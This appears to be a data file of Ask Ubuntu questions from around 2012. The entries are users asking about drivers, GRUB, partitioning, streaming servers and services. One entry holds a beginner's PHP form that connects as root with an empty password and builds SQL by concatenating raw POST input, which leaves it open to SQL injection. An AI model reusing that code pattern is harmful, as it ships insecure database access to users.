206628	setting up icecast2 streaming server on the internet for live streaming	i have looking through tutorials for setting up icecast2 server and ices2 on ubuntu . unfortunately all of these are based on lan . i want to set up a icecast server on a ubuntu machine which will be connected 24/7 to the internet . the clients need to access the streams , the server provides from across the globe . assuming the server has a static ip , how do i configure icecast ? also i have a behringer uca 202 as a capture source . how do i configure ices2 to use this as a live capture source and stream it to the the above mentioned server . thanks in advance .
206630	migration failed in ubuntu 11.04	unable to migrate error : operation failed : migration to 'tcp : cloud:49154 ' failed migration failed
206634	how to compile ubuntu webapps app userscript ?	i 've created a userscript ( .user.js.in file ) in src folder of webapps-application.so how can i compile it now ?
206635	unable to insert the form values into database	< ! doctype html public `` -//w3c//dtd xhtml 1.0 transitional//en '' `` http : //www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd '' > < html xmlns= '' http : //www.w3.org/1999/xhtml '' > < head > < meta http-equiv= '' content-type '' content= '' text/html ; charset=utf-8 '' / > < title > ewedding < /title > < link href= '' source.css '' rel= '' stylesheet '' type= '' text/css '' / > < script src= '' http : //ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js '' > < /script > < script type= '' text/javascript '' src= '' script.js '' > < /script > < script type= '' text/javascript '' src= '' jquery.validate.min.js '' > < /script > < link rel= '' stylesheet '' type= '' text/css '' href= '' styles.css '' > < link rel= '' stylesheet '' type= '' text/css '' href= '' bootstrap.css '' > < style > body { background-color : # c6f5f2 ; } # content { background-color : # c6f5f2 ; width:950px ; min-height:550px ; text-align : left ; padding:20px ; } h1 { padding:20px 10px 20px 10px ; } h2 { padding-left : 0px ! important ; } # header { background-color : # ca410b ! important ; } .large { font-size:22px ; } .orange { color : orange ; } .italic { font-style : italic } .textmiddle { vertical-align : middle ; } .padout { padding-left:25px ; padding-right:25px ; } .rounded-corners { -moz-border-radius : 40px ; -webkit-border-radius : 40px ; -khtml-border-radius : 40px ; border-radius : 40px ; } .rounded-corners-top { -moz-border-top-radius : 40px ; -webkit-border-radius : 40px ; -khtml-border-radius : 40px ; border-radius : 40px ; } .right { float : right ; } .scrolldown { padding-left:20px ; color : # edece8 ; font-size:40px ; font-weight : bold ; vertical-align : middle ; text-shadow : # 6374ab 2px 2px 2px ; } .contentblock { margin : 0px 20px ; } .results { border : 1px solid blue ; padding:20px ; margin-top:20px ; min-height:50px ; } .blue-bold { font-size:18px ; font-weight : bold ; color : blue ; } /* example styles for validation form demo */ # register-form { background : url ( `` form-fieldset.gif '' ) repeat-x scroll left bottom # f8fdef ; border : 1px solid # dfdcdc ; border-radius : 15px 15px 15px 15px ; display : inline-block ; margin-bottom : 30px ; margin-left : 20px ; margin-top : 10px ; padding : 25px 50px 10px ; width : 350px ; } # register-form .fieldgroup { background : url ( `` form-divider.gif '' ) repeat-x scroll left top transparent ; display : inline-block ; padding : 8px 10px ; width : 340px ; } # register-form .fieldgroup label { float : left ; padding : 15px 0 0 ; text-align : right ; width : 110px ; } # register-form .fieldgroup input , # register-form .fieldgroup textarea , # register-form .fieldgroup select { float : right ; margin : 10px 0 ; height : 25px ; } # register-form .submit { padding : 10px ; width : 220px ; height : 40px ! important ; } # register-form .fieldgroup label.error { color : # fb3a3a ; display : inline-block ; margin : 4px 0 5px 125px ; padding : 0 ; text-align : left ; width : 220px ; } < /style > < script type= '' text/javascript '' > /** * basic jquery validation form demo code * copyright sam deering 2012 * licence : http : //www.jquery4u.com/license/ */ ( function ( $ , w , d ) { var jquery4u = { } ; jquery4u.util = { setupformvalidation : function ( ) { //form validation rules $ ( `` # register-form '' ) .validate ( { rules : { first : `` required '' , last : `` required '' , email : { required : true , email : true } , pno : `` required '' , add : `` required '' , city : `` required '' , state : `` required '' , agree : `` required '' } , messages : { first : `` please enter your firstname '' , last : `` please enter your lastname '' , email : `` please enter a valid email address '' , pno : '' please your contact number '' , add : '' please your address '' , city : '' please enter your city '' , state : '' please enter your state '' , agree : `` please accept our policy '' } , submithandler : function ( form ) { form.submit ( ) ; } } ) ; } } //when the dom has loaded setup form validation rules $ ( d ) .ready ( function ( $ ) { jquery4u.util.setupformvalidation ( ) ; } ) ; } ) ( jquery , window , document ) ; < /script > < /head > < body > < ? php //ftp host : -- ftp.webdesignerexperts.com error_reporting ( 5 ) ; $ host= '' localhost '' ; $ username= '' root '' ; $ password= '' '' ; $ database= '' ewedding '' ; $ con=mysql_connect ( $ host , $ username , $ password ) or die ( `` connect to the database '' ) ; $ link=mysql_select_db ( $ database , $ con ) ; ? > < body > < ? php if ( isset ( $ _request [ 'submit ' ] ) ) { $ first = $ _post [ 'first ' ] ; $ last = $ _post [ 'last ' ] ; $ email = $ _post [ 'email ' ] ; $ pno = $ _post [ 'pno ' ] ; $ add = $ _post [ 'add ' ] ; $ city= $ _post [ 'city ' ] ; $ state= $ _post [ 'state ' ] ; /* insert values in database */ $ sql= '' insert into register_form ( first , last , email , pno , add , city , state ) values ( ' '' . $ first . `` ' , ' '' . $ last . `` ' , ' '' . $ email. '' ' , ' '' . $ pno . `` ' , ' '' . $ add . `` ' , ' '' . $ city . `` ' , ' '' . $ state . `` ' ) '' ; $ qry=mysql_query ( $ sql ) ; if ( $ qry ) { $ emailmsg= '' thanx for showing your interest in ______.com , your profile has been successfully created and will be live after approval from admin '' ; } } ? > < ? php include `` includes/header.php '' ? > < h2 style= '' color : # 2c97ae '' ; > client register < /h2 > < form name= '' register-form '' method= '' post '' onsubmit= '' '' action= '' '' id= '' register-form '' novalidate= '' novalidate '' > < div id= '' form-content '' > < h3 style= '' color : # 2c97ae '' ; > choose the type of vendor you are < /h3 > < select > < option selected= '' selected '' > -- choose any one of them -- < /option > < option value= '' 1 '' > user < /option > < option value= '' 2 '' > < a href= '' vendor.php '' > vendor < /a > < /option > < /select > < p > < /p > < label > first name < span style= '' color : # f00 '' > * < /span > < /label > < input type= '' text '' name= '' first '' id= '' first '' / > < br / > < label > last name < span style= '' color : # f00 '' > * < /span > < /label > < input type= '' text '' name= '' last '' id= '' last '' / > < br / > < label > email < span style= '' color : # f00 '' > * < /span > < /label > < input type= '' text '' name= '' email '' id= '' email '' / > < br / > < label > contact number < span style= '' color : # f00 '' > * < /span > < /label > < input type= '' text '' name= '' pno '' id= '' pno '' / > < br / > < label > address < span style= '' color : # f00 '' > * < /span > < /label > < input type= '' text '' name= '' add '' id= '' add '' / > < br / > < label > city < span style= '' color : # f00 '' > * < /span > < /label > < input type= '' text '' name= '' city '' id= '' city '' / > < br / > < label > state < span style= '' color : # f00 '' > * < /span > < /label > < input type= '' text '' name= '' state '' id= '' state '' / > < br / > < input type= '' submit '' value= '' create my account '' name= '' submit '' id= '' submit '' class= '' submit '' / > < /div > < /form > < ? php include `` includes/footer.php '' ? > < /body > < /html >
206639	12.10 install overwrote my windows partition	recently decided to switch back to ubuntu . i have a 3tb drive which was running win7 . i had 3 partitions . c : for windows d : data e : data have installed ubuntu before so 'thought ' i knew what i was doing . i using netbootin i installed from a usb stick . i did n't choose the default options but i did n't choose the 'manual install ' either . i ca n't remember what option i took but i figured at some stage it would tell me how it was going to partition the disk and at that stage i would see if it had recognised the ntfs partitions and i would be able to abort if it did n't . unfortunately , it did n't and just went ahead and installed ubuntu and made up it 's own mind on how it was going to partition the disk . usual story , the two ntfs data partitions were n't backed up . is there anything i can do to retrieve the ntfs data ? i 'm currently trying out testdisk and i know i can use photodisk to retrieve certain file types but all the filenames will be lost and it 's going to take a hell of a lot of time to rename them all . any help or assistance would be more than gratefully accepted . thanks in advance , niall
206641	c programming using school server	i connect to my school server using the terminal . i try to run my main.c on their computer . but i do not know how to do it . should i copy the files to my school and then run or something else ? what are the commands i need to write after i connect to school computers . ( school = university ) .
206648	how to make modem faster ?	i am new and i just installed ubuntu on my desktop . do i have to install drivers for my modem for it to download fast ? because the download speed i am getting is really slow compared to my mac .
206649	make battery warning appear on top	how can i make the low battery message appear on top of all running windows ? for example it happened that i watched a movie and the computer suspended because the battery was low , but the warning messages were not visible while watching the movie .
206650	vmware player is crashing the whole os	i am using ubuntu 12.04 ( with latest updates ) on lenovo thinkpad t430 . both os and machine are 64 bits and i got crashes when try to use vmware player to create a vm . i have install vmware player 64 bit from the official site successfully but when i start to create a vm the whole machines restarts any one know the issue ? thanks
206652	how to ensure nvidia_current module loads during boot	i am running ubuntu 12.10 on an asus g75v laptop with nvidia gforce gtx 660m . i first run 12.04 on this machine and was able to install nvidia_current drivers from swat ppa : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current this worked in 12.04 and after rebooting the machine my graphics where working properly . after upgrade to 12.10 however , the machine boots into a low resolution desktop which i can not really interact with . i suspect this is due to the driver not being loaded properly . to fix this , i have to switch to ctrl+alt+f1 session and manually load the nvidia_current module and restart the desktop manager : sudo modprobe nvidia_current sudo service lightdm restart now everything works fine again . however , i would like not to have to do this every time i reboot the machine . i also dont want to hack an script to do this on load . basically , if things are setup currectly , the nvidia_current driver which is installed should load . how can i make sure nvidia_current driver module loads properly when system starts ? edit : i tried removing the ppa and installing nvidia-current-update as was suggested in the comments . however , i still face the same problem . the only difference is that now when i restart i come back to desktop with this distorted image : it appears that nvidia module is not being loaded properly when system boots , even though working drivers are installed . again , to work around this issue i can switch to ctrl+alt+f1 session and login . then i can run this code to get the driver loaded and the desktop back : sudo modprobe nvidia_current_updates sudo service lightdm restart i thought it may be that nvidia_current_updates is somehow being blacklisted somewhere or that nouveau driver is not being blacklisted . so i went into /etc/modprobe.d directory and take a look around . i could not find any evidence of that . here is the content of nvidia-graphic-drivers.conf which seems relevant : : /etc/modprobe.d $ cat nvidia-graphics-drivers.conf # this file was installed by nvidia-current-updates # do not edit this file manually blacklist nouveau blacklist lbm-nouveau blacklist nvidia-173 blacklist nvidia-96 blacklist nvidia-current blacklist nvidia-173-updates blacklist nvidia-96-updates alias nvidia nvidia_current_updates alias nouveau off alias lbm-nouveau off
206654	ubuntu 12.10 grub does n't appear efi mode	after a number of failed attempts on installing ubuntu and linux in the hybrid-gpt of windows , in which i wanted different partitions by gparted , i ended up creating againg a conventional partitions table within the conventional system . this photo is not mine because as creating the partition i did not think in taking photos , but i am showing you it so that you can see the format “ms-dos” , the standard format of gparted . my neetbook is a k55mv asus 500gb ( the page do n't allow me to put 3 hiperlink i will put it at the end in a new coment 1 ) i installed windows by creating a partition just for it . windows created two partitions else for starting the system up . however creating it on ms-dos appear now in gpt view fotos 2 ) with the rest of the space , i created a 90-gigabyte partition for ubuntu and the “swap” of 4 gb . the other partitions are for data . 3 ) i assured myself about installing ubuntu in the partition whose format was ext4 , for using that partition as base and to install the “grub” on the base of 500gb . i have boot the system up , ubuntu is loaded but the grub does not appear . i have tried by pressing “beginning” “upper case letter” , but no way ! i have checked the flies up , and partitions are there . http : //www.subirimagenes.com/imagen-capturadepantalla-8080960.html by pressing fdisk-1 , this picture comes up : http : //www.subirimagenes.com/imagen-capturadepantalla-8080965.html i am spanish updated : at the beginning of the system , pressing f12 appears a grub without windows
206658	changing default application	i have recently installed sublime text 2 and i must say it 's one of the best text editors i 've ever used or even seen in use . so i managed to install everything and added to the unity menu and also change all the entries of gedit.desktop to sublime.desktop and it works just fine for most files , but i realised that some files still open in gedit , for example php files . i checked the default list for php , but there is n't anything in there . how would i set the default for opening php files ? also , sublime does n't show up in them properties menu where i can usually select the default program . i 'm using ubuntu 12.10 .
206659	how to setup internet connection and access windows partitions in ubuntu ?	i have installed ubuntu 12.10 , so could you please say me how to connect to internet ( wired and wireless ) or else is i need to install any drivers . in parallel i have windows 8 so is it possible to share internet from the windows or else i need to install a separate driver for ubuntu ? ? please say me that is it there any possibilities to change from windows to ubuntu without restarting the pc ?
206662	error while installing openoffice	i was installing openoffice using these commands sudo add-apt-repository ppa : upubuntu-com/office sudo apt-get update sudo apt-get install openoffice now after downloading some 20mb my internet connection interrupted when again it tried to install it says as follows err http : //ppa.launchpad.net/upubuntu-com/office/ubuntu/ precise/main openoffice amd64 3.4~precise connection failed failed to fetch http : //ppa.launchpad.net/upubuntu-com/office/ubuntu/pool/main/o/openoffice/openoffice_3.4~precise_amd64.deb connection failed e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? how to solve these errors ?
206671	ubuntu o xubuntu ?	i have installed before ubuntu 12.04 on my pc and it is slowly , after i install ubuntu 12.10 and i had a quantal problem ; my pc has 734 mb go ram and for this reason i create a swape partition of 1.5 gb . i should install ubuntu 12.04 ( that was slowly ) or xubuntu ? ? my pc configuration : ram 734 mb processor 1,60 ghz thank you
206672	is there internet bug in ubuntu 12.10	i installed ubuntu 12.10 on 2 disk partitions and installed mts mblaze usb modem on both the partitions.when i start any of these 2 partitions , i get the message `` connection established '' , but `` modem manager crash '' message in both of them , and i ca n't open any web page , nor ping 8.8.8.8mts is working fine in ubuntu 12.04 partition.is this ubuntu 12.10 bug , or something particular with the new version ? thanksi manually downloaded wvdial and its dependencies , installed and finally it is running.thanks to all of you for support .
206676	( thinkpad t400 ) two-finger scroll stops working after reboot	i am using ubuntu 12.10 and i really want to use two-finger scrolling on the synaptics touchpad . i ca n't activate it in the system preferences because the checkbox is disabled . finally i managed to get it up and running as described here . but after rebooting the system it just does n't work any more . any ideas how to fix that ?
206681	empathy not showing in messageing menu	i just installed 12.10 and noticed that , even if i added more than one account to online accounts and i 'm actually using empathy to chat , it is not present in messaging menu or in any other point of the tray . this means that if i close it , it remains open but inaccessible and i have to start it again from dash . how can i integrate it in messaging menu ( should n't this be the default ? ) or , at least , make it showing me a tray icon ?
206684	acer aspire v5-431 drivers for 12.10	i installed ubuntu 12.10 in my notebook acer aspire v5-431 , but could n't find drivers for this . could anyone please tell me where could i find the drivers ? also , i could n't find the appearance ( graphics settings ) in this version of ubuntu . like it was there when i was using ubuntu 9 . nice animations were there while dragging windows or switching windows with alt+tab but i could n't find any of these in this version . can anyone please help me out ?
206686	xubuntu boot time slowed after upgrade to 12.10	i run xubuntu 12.10 on a hp netbook n455 . before the upgrade a few days ago my xubuntu was responsive at boot after 58 seconds - the desktop showed up a few seconds earlier . now , after the upgrade to 12.10 my desktop is responsive after about 110 seconds , i.e. , 1 minute 45 seconds . the whole point of having xubuntu on my netbook seemed to have vanished . i checked the startup apps but the list is the same as before the upgrade . how can i tell why booting takes so long ? is 12.10 supposed to be so much slower ?
206689	how do i keep webapps from appearing in launcher ?	i 've been looking for a way to keep them from appearing in the bar ( and taskswitcher ) . i want to use webapps , since i quite like the idea of integration ( especially for google docs and gmail ) , but i hate when i have ten of them in the sidebar . is there anyway to use them without them popping up there ?
206691	ca n't install 12.04 on dell latitude c400	i have a dell c400 that had windows 2000 on it . i am trying to install 12.04 on it but was unsuccessful . i even tried the alternate cd , and it reformatted the hard drive , then stops , saying `` util-linux_2.20.1-1ubuntu3_i386.deb is corrupt '' . i searched the alternate cd and can find no instance of that file . any suggestions on how to install ubuntu on my dell latitude c400 with 20gb hard drive and 500mb memory ?
206693	how to change the icon of an aplicatication at the lxpanel on lubuntu ?	after installing lubuntu 12.10 , i decided to install idle 3 ( from the official ubuntu repository ) , but something unexpected happened , its icon gets bigger then the lxpanel and all the another aplications icos , the same happens at the menu when i select it from menu > programming > idle 3 check the image : note : was n't possible to take a printscreen from idle at the menu because the printscreen action ignore the menu when it is opened . knowing that i 'd like to know how to change the icon of an application ? or better , if possible , how to resize this specific icon to normal size ?
206695	ubuntu 12.04.1 sw raid grub `` out of disk '' , but works when i remove one disk	i have installed ubuntu 12.04.1 lts amd64 on an old dell d630 with 2x 1 tb hdds in a raid1 array . the second disk is located in the d630 's media bay where the cdrom used to sit . this setup works perfectly . but : when both disks are in place , the system goes into grub rescue on boot and says `` out of disk '' . as soon as i remove the hdd in the media bay , it boots correctly . i have not tried removing the internal hdd . i can push the media bay hdd back into the system right away before boot continues and then i do n't even need to rebuild the raid . of course , i installed grub on both disks . i checked and re-checked the cfg files , but everyting seems fine . md1 : active raid1 sdb5 [ 0 ] sda5 [ 1 ] 11881408 blocks [ 2/2 ] [ uu ] md0 : active raid1 sdb1 [ 0 ] sda1 [ 1 ] 964878272 blocks [ 2/2 ] [ uu ] lspci : 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] ( rev 02 )
206696	problem building and installing geary	i 'm using ubuntu 12.10 and i 'd like to install geary 0.2.2 . when i type ./configure , it shows : peng @ peng-thinkpad-sl410 : ~/downloads/geary-0.2.2 $ ./configure cmake version 2.8.9 -- the c compiler identification is gnu 4.7.2 -- check for working c compiler : /usr/bin/gcc -- check for working c compiler : /usr/bin/gcc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done -- icon cache will be updated -- desktop database will be updated -- found pkgconfig : /usr/bin/pkg-config ( found version `` 0.26 '' ) -- xgettext found cmake error at /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:97 ( message ) : could not find vala ( missing : vala_executable ) call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:288 ( _fphsa_failure_message ) cmake/findvala.cmake:55 ( find_package_handle_standard_args ) src/cmakelists.txt:269 ( find_package ) -- configuring incomplete , errors occurred ! unable to prepare build directory .
206698	changing system name	i am given an old ubuntu working system and the previous user had everything on his name so started turning it to my name as typing his name everywhere was bugging me . i tried $ usermod -l hussain darhamid so it turned the darhamid @ darhamid : $ into hussain @ darhamid : $ but i want this hussain @ darhamid : $ also changed to hussain . what should i do ? i am using ubuntu 12.04
206700	my asus u32u with fresh xubuntu install shows a black screen 50-80 % of the startups	i have recently installed ubuntu 12.10 with xubuntu-package on my asus u32u notebook ( radeon hd 6320 gpu ) . the issue i have is that more often than not , after the grub-select screen i get a black screen , and three times total white lines ( kind of ) flashes very quickly ( with maybe 5 seconds between each flash ) . i 'm not even able to get to the login-screen ( nor the xubuntu loading screen ) . at first i thought it was simply me having installed something dumb or messed up some settings , but even after reformatting the partition and installing ubuntu again , the problem remains . before i formatted it xfce4 's window manager would n't start either , but it does now ( when i am able to see anything ) . i can access the virtual console with ctrl + alt + f1 , but i ca n't see anything . i 've managed to shutdown the computer by using sudo shutdown -h now
206705	connecting from work to home-	any thoughts on how i can connect to my ubuntu pc at home from work given they do n't allow outbound vpn connections from the office ? for my xp machine , i use logmein .
206706	how to install abiword -2.8.6	folks , i am totally new to linux , i am using ubuntu 12.04 with cinnamon desktop , i want to install abiword ( an older version ) because it 's very stable compared with the new one . i have downloaded the tar file and uncompressed it but i do n't know what to do next . the software centre only has the new unstable version how can i do this by editing menu ? step by step please people i am so new .
206710	how do i disable unity webapps notifications from popping up everytime i visit a supported webpage ?	every time i visit a website which supports unity webapp integration , a pop up dialog box out of the 'i ' in the address bar appears which gets in my way and distracts me from what i am doing . i do not wish to click the always ignore drop down for every supported webpage , so is there a way to disable this notification box entirely ( or even just uninstall webapp integration ) ?
206711	upgrade killed my asus eeepc	on upgrading from 12.04 to 12.10 , the system would n't reboot , it just hung . i decided on a clean install and rebooted from a usb stick with the 12.10 iso image . on installing , it detected that 12.10 was already present so i chose the `` reinstall '' option . it seemed to hang on reinstalling ( spent about an hour doing seemingly nothing , so i turned off and rebooted , having decided to go for a clean install . however , the netbook no longer boots from a usb stick . when i hit esc or f2 i get the option , but it either skips straight to the hard drive ( and broken system ) or dumps me in the bios . i 've tried changing the boot order , but it still skips over the usb . i 've tried other live usbs and the same thing happens . i 've also remade the live usb , but the issue continues . is there any way to rescue this netbook ? edit - booting from the hard drive takes me to a busybox shell . is there anything i can do from there ?
206715	home directory lost the execute permission flag . what can cause this ?	did anyone ever experienced a home directory mysteriously becoming non-executable ? the context : ubuntu 10.04 . the vsftpd server is installed and running . i have created a regular user ftp_poze . another application uploads via ftp some files into the ~ftp_poze/images directory . what happened : for some strange reason , the ftp uploading stopped working . when analysing the situation , i found /home/ftp_poze and /home/ftp_poze/images with some strange permissions 0440 the user was no longer able to access its own home directory ! i have already fixed the directory permissions , but i need to understand what did actually happen . does anyone have any idea about what could have caused the directory permissions to be changed ? i am certain that it did n't happen due to human intervention .
206721	how to remove ubuntu without affecting windows	i installed ubuntu 12.10 along with windows but now i want to permanently remove it from my computer as it is quite uncomfortable to evrytime choose the os for boot during startup pls help
206724	does the touch interface on new windows 8 computers work in ubuntu ?	i 'm a new linux/ubuntu user . i realize that multitouch exists for touchpads , but are touch screens supported ?
206726	my local ubuntu server is not updated	i am from nepal and it 's faster to download apps from server for nepal using through ubuntu software center . but when i use np.archive.ubuntu.com server . there is no updated softwares and few softwares and nvidia driver are outdated . for e.g . i can not even install openshot when i user server for nepal . it provides error which can not be solved . i want to know how can the server for nepal be updated frequently with us.archive.ubuntu.com . i use ubuntu 12.10. and i want to use server for nepal since the download speed faster than 2x than from us server .
206729	i am not able to choose between windows 7 and ubuntu in the boot screen	i first installed windows 7 in a partition . then installed ubuntu in another partition . but i am not able to choose between those 2 . it is directly going into windows 7 . please
206731	there is something wrong with my computer . how to find out what is worng ?	the background i have ubuntu 12.04 running on a thinkpad with 7.7 gib ram and intel® core™ i3-2310m cpu @ 2.10ghz × 4 processor i do a lot of development on my machine . mostly i use aptana studio and webstorm by jetbrains . i keep a couple of development servers running all the time that are waitress servers running pyramid web servers . other than this , i keep using ssh , browsers , skype and other normal software that have never given me any problem in ages memory of the laptop is 8 gb , the swap size is 2 gb here is what is happening , off late the computer has started going crazy . there has been no change in my usage . i still am the same user i was for a long time . the computer freezes a couple of times a day and nothing works fast enough . including ctrl+alt+delete , ctrl+alt+f1 etc . i opened system monitor to see what is causing the problem . all the processes are normal except that the swap is filled to 100 % when the problem is happening . the only other problem i can see is that the hard disk light is on all the time . the ram usage is not even crossing 10 % and my cpu is fine . computer is not overheating either . none of the cpu cores have any problem . i am not able to understand what the problem is . i need help to track down the problem . i have been using ubuntu for 5 years now and i am good enough with linux to do whatever to get it back to working . but i have no idea where to begin .
206734	online accounts in ubuntu 12.10	when i head to online accounts and try to add facebook , it asks me to enter username and password , then save the device by giving it a name , but then the blue circle spins around for a second or two then i get a blank page and facebook is n't being added . it was working before i removed it , so i 'm not sure what 's happening . anyone got an idea of what i can do ?
206740	ubuntu 12.10 graphics does not work properly	my graphic on ubuntu 12.10 does not work as well as on 12.04 . after upgrade i installed driver sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current for my nvidia 450 gts graphics card . but sometimes i see slight lag on my videos played in vlc player , some of desktop and window effects are lagging , sometimes i can see an indescribable souce of pixels on my screen at the start of ubuntu and so on . here is screenshot of startup screen . i feel difference between 12.04 and 12.10 in favour of former version . does anyone know whats wrong or what i am missing ?
206745	apt sources.list disabled on upgrade to 12.04	after a do-release-upgrade , i 'm now running ubuntu 12.04 lts , as indicated below > lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04 lts release : 12.04 codename : precise however , i find that all the entries in my /etc/apt/sources.list were commented out except for one . question : is it safe for me to edit these , replacing the old 'lucid ' with 'precise ' in what is shown below ? # # unixteam source list # deb http : //debian.yorku.ca/ubuntu/ precise main main/debian-installer restricted restricted/debian-installer # disabled on upgrade to precise # deb-src http : //debian.yorku.ca/ubuntu/ precise main restricted # disabled on upgrade to precise # deb http : //debian.yorku.ca/ubuntu/ lucid-updates main restricted # disabled on upgrade to precise # deb-src http : //debian.yorku.ca/ubuntu/ lucid-updates main restricted # disabled on upgrade to precise # deb http : //debian.yorku.ca/ubuntu/ precise universe # disabled on upgrade to precise # deb-src http : //debian.yorku.ca/ubuntu/ precise universe # disabled on upgrade to precise # deb http : //debian.yorku.ca/ubuntu/ precise multiverse # disabled on upgrade to precise # deb-src http : //debian.yorku.ca/ubuntu/ precise multiverse # disabled on upgrade to precise # deb http : //debian.yorku.ca/ubuntu lucid-security main restricted # disabled on upgrade to precise # deb-src http : //debian.yorku.ca/ubuntu lucid-security main restricted # disabled on upgrade to precise # deb http : //debian.yorku.ca/ubuntu lucid-security universe # disabled on upgrade to precise # deb-src http : //debian.yorku.ca/ubuntu lucid-security universe # disabled on upgrade to precise # deb http : //debian.yorku.ca/ubuntu lucid-security multiverse # disabled on upgrade to precise # deb-src http : //debian.yorku.ca/ubuntu lucid-security multiverse # disabled on upgrade to precise # r sources # see http : //cran.us.r-project.org/bin/linux/ubuntu/ for details # deb http : //probability.ca/cran/bin/linux/ubuntu lucid/ # disabled on upgrade to precise deb http : //archive.ubuntu.com/ubuntu precise main multiverse universe
206747	can not install anything from the software center in 12.10	i just downloaded 12.10 and i ca n't seem to download and install anything , from plugins to programs , from the software center . it says not found . there isn’t a software package called “name” in your current software sources . i 've tried a couple of proposed solution from here but nothing is working . any ideas would be great .
206756	/etc/init.d/openvpn not starting automatically but can be started manually	this is about init.d or upstart init or something else , maybe , i think . but only openvpn is affected so far , after upgrading from ubuntu 12.04 lts to ubuntu 12.10 on my vps . the problem is : openvpn daemon failed to start automatically on boot after upgrading . but start it manually with service openvpn start works just fine . some info : other services like sshd , bind9 , postfix work fine . /etc/default/openvpn is fine . /etc/init.d is fine and i 've already tried update-rc.d openvpn enable|remove|defaults . in vain . i did not touch /etc/openvpn before upgrading and everything there is fine . /var/log/boot.log shows autostarting vpn 'foobar ' but nothing happened actually . my openvpn log will not record anything during boot unless i start it manually . that to say , openvpn was not `` starting ... failing ... exiting '' , but it did not get started at all . if it was `` starting ... failing ... exiting '' , it would leave something in the log . here goes the most unbelievable fact : even if i add service openvpn start in /etc/rc.local , it does not work . furthing investigating revealed that whatever i added in /etc/rc.local , it did not run . this file is well ended with exit 0 and with execuatable bit . it seems `` init '' ignores it at all . after working on this for a whole afternoon , goolging into many forums and stackexchange questions , i did not get it right ... the only workaround i can think of is , after every reboot , log into the system , and run service openvpn start manually ... could anyone help me get out this ? btw , another delicated server with ubuntu server , upgrading from 12.04 lts to 12.10 works fine with openvpn . wird ...
206759	gtk-redshift ca n't get location using geoclue	i have always used gtk-redshift to adjust the color temperature of my laptop , but since i 've upgraded it to ubuntu 12.10 , redshift does n't work anymore . when i start it i get this error : started geoclue provider `geoclue master ' . using provider `geoclue ' . ** warning ** : could not get location , 3 retries left . ** warning ** : could not get location , 2 retries left . ** warning ** : could not get location , 1 retries left . ** warning ** : provider does not have a valid location available . unable to get location from provider . i know that i can force the latitude and the longitude without using a provider , but i 'm travelling frequently so it 's not a good solution for me . i 've already tried some solutions like installing geoclue-hostip with no luck . it seems to be a ubuntu 12.10 dependant issue . have you experienced the same issue ?
206762	where is the messaging menu in 12.10 ?	all of a sudden , after the volume slider disappeared , now the messaging menu has disappeared too ! after the last update , now the messaging menu does not show anything written ! here is a screenshot- its all that can be seen ! now how do i get it back ?
206765	can i enable os x-style mouse wheel scrolling ( not natural scrolling )	this is the way that mac os scrolling with a boring old handheld mouse works ( as opposed to fancy soap bar and multitouch mice ) : the more and the faster you scroll , the further the mouse scrolling goes . for instance , if i scroll one little tick on the mouse , the window scrolls a tiny amount . however , if i scroll twice in fast succession , the window scrolls a small amount once and then a faster amount the next time , etc . ubuntu has boring old pure linear scrolling . is there nay way i can enable the mac os scrolling ?
206766	local only sendmail that delivers all mail to a directory	i have a development ubuntu server ( 12.04.1 ) vm that i use to develop php sites and e-commerce sites ( like magento etc ) . because this is for development purposes , and i need to test with e-mail addresses other than my own , i need a way for the sendmail command to accept a mail but not actually deliver it , but rather archive is somewhere where i can look at it . what is the easiest way to install a mail server such that the sendmail command routes all mail to a local directory ? i.e . i do not want any mail to be delivered to the internet . i tried the steps discussed in this question ( smtp server to deliver all mail to user @ localhost ) , but it does n't seem to work - i get an error message in my ( local ) mailbox telling me that it can not deliver my test message ( e.g . someone @ gmail.com )
206769	what do the colors in power statistics mean ?	i was looking at my power statistics and noticed three different colors are used : green , blue and red . what do they mean ?
206772	with opensync removed in 12.10 , how to sync my nokia e51 's contacts ?	i know that ubuntu ( and debian , for that matter ) stuggles with the opensync synchronisation framework for quite some time . finally , for quantal ( 12.10 ) , they decided to remove opensync altogether . so , how do i synchronise the contacts on my phone with any local e-mail client now ? anything more fancy than typing in the numbers by hand will do . personal remark : i really think this whole opensync struggle is a very ugly tale about free software . it really seems nobody on either side cared at all and this kept an otherwise perfectly working piece of software from the users in need .
206773	how to completely erase hard drive ?	i am looking for software/script/whatever that can completely destroy data on hard drive . by destroy i mean beyond recovery ( even with special software ) . is there any way to do this ? thanks .
206786	no install alongside windows option	i downloaded ubuntu and put it onto a dvd and i assume it works fine because the disk is working . i looked around at the options and noticed that i could install alongside windows , but i chose to just try it . now i 've decided to install it alongside windows ( vista ) but now the option is no longer there . any ideas.. ?
206788	creating extended partition	this is my current hard disk status ( running linux mint live cd ) i have- ubuntu 12.04 on 206 gb partition at dev/sda1 . dev/sda2 system reserved . windows 7 on 90gb partition at dev/sda3 and linux swap in extended partition . what i want to do- i want to install linux mint kde on my system for that i want to create a new partition of 30gb ( by shrinking the free space available at dev/sda1 ) , i ca n't create that because i can create only 4 primary partitions which are already there . so do i have to delete the swap partition ? and if i did how to force mint kde and ubuntu 12.04 to use/share same swap space in new logical partition ?
206789	screen flicker on mouse scroll	when i log in , everything works well for 5 minutes , then there is blank screen for 2 sec and again the display comes on the monitor but after that , the screen starts flickering on mouse scroll and the system becomes too slow . i have found a workaround : i go to sys setting > display and change to the lower resolution and on the confirmation screen i choose 'restore previous configuration ' and again everything starts working normally . but this has become a ritual of sort for me . is there a permanent resolution for this ?
206794	find the icon for a specific file type	is there any way to find the icon for a specific file type ? i 'd like to write a shell script that returns the location of the image file , or icon , for a specific file type .
